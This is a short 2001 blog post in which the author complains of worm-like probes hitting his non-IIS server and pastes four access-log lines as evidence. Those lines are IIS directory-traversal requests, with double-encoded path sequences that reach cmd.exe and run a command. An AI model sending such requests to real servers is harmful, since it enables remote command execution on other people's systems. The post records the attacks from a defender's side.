So once again, there seems

By Gregory on September 18, 2001 3:13 PM

So once again, there seems to be some kind program trying to hack into my system. And once again, the twits doing it don't seem to realize that I am not running IIS. The thing is, I'm getting hits for this from a ton of machines. Anyone know of a new worm making the rounds? The hits look like this:

209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
209.67.61.53 - - [18/Sep/2001:10:03:56 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

Categories

Monthly Archives

Pages

Powered by Movable Type 8.0.2

Search

About this Entry

This page contains a single entry by Gregory published on September 18, 2001 3:13 PM.

So tonight is anime night was the previous entry in this blog.

Well, that bit of stuff is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.